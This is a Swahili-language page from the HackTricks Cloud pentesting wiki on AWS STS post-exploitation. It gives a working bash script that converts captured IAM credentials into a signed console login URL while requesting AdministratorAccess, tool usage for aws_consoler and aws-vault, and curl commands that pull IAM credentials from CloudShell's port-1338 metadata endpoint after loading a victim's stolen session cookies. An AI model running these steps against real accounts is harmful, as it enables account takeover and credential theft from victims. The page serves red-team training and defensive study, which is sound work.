Swahili - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - STS Post Exploitation

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

STS

Kwa maelezo zaidi:

AWS - IAM, Identity Center & SSO Enum

Kutoka IAM Creds hadi Console

Ikiwa umefanikiwa kupata baadhi ya hati za IAM unaweza kuwa na nia ya kupata ufikiaji wa web console kwa kutumia zana zifuatazo. Kumbuka kwamba mtumiaji/nafasi lazima iwe na ruhusa sts:GetFederationToken.

Script ya kawaida

Script ifuatayo itatumia wasifu wa chaguo-msingi na eneo la chaguo-msingi la AWS (sio gov na sio cn) kukupa URL iliyosainiwa unayoweza kutumia kuingia ndani ya web console:

# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
## Don't forget to use [--profile <prof_name>] in the first line if you need to
output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)

if [ $? -ne 0 ]; then
echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
exit $status
fi

# Parse the output
session_id=$(echo $output | jq -r '.Credentials.AccessKeyId')
session_key=$(echo $output | jq -r '.Credentials.SecretAccessKey')
session_token=$(echo $output | jq -r '.Credentials.SessionToken')

# Construct the JSON credentials string
json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")

# Define the AWS federation endpoint
federation_endpoint="https://signin.aws.amazon.com/federation"

# Make the HTTP request to get the sign-in token
resp=$(curl -s "$federation_endpoint" \
--get \
--data-urlencode "Action=getSigninToken" \
--data-urlencode "SessionDuration=43200" \
--data-urlencode "Session=$json_creds"
)
signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)



# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"

aws_consoler

Unaweza kuzalisha kiungo cha web console na https://github.com/NetSPI/aws_consoler.

cd /tmp
python3 -m venv env
source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] #This will generate a link to login into the console

Hakikisha mtumiaji wa IAM ana ruhusa ya sts:GetFederationToken, au toa jukumu la kuchukua.

aws-vault

aws-vault ni chombo cha kuhifadhi na kufikia sifa za AWS kwa usalama katika mazingira ya maendeleo.

aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith

Unaweza pia kutumia aws-vault kupata browser console session

Kutoka Console hadi IAM Creds

Awali iligunduliwa katika chapisho hili, Ikiwa utafanikiwa kupata ufikiaji wa console ya wavuti (labda uliiba cookies na hukuweza kufikia folda ya .aws), unaweza kupata token za IAM kwa mtumiaji huyo kupitia CloudShell.

CloudShell inaonyesha IAM credentials kupitia endpoint isiyojulikana kwenye port 1338. Baada ya kupakia session cookies kutoka kwa mwathirika kwenye kivinjari chako, unaweza kwenda kwenye CloudShell na kutoa amri zifuatazo kupata IAM credentials.

TOKEN=$(curl -X PUT localhost:1338/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 60")
curl localhost:1338/latest/meta-data/container/security-credentials -H "X-aws-ec2-metadata-token: $TOKEN"

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
PreviousAWS - Step Functions Post ExploitationNextAWS - VPN Post Exploitation

Last updated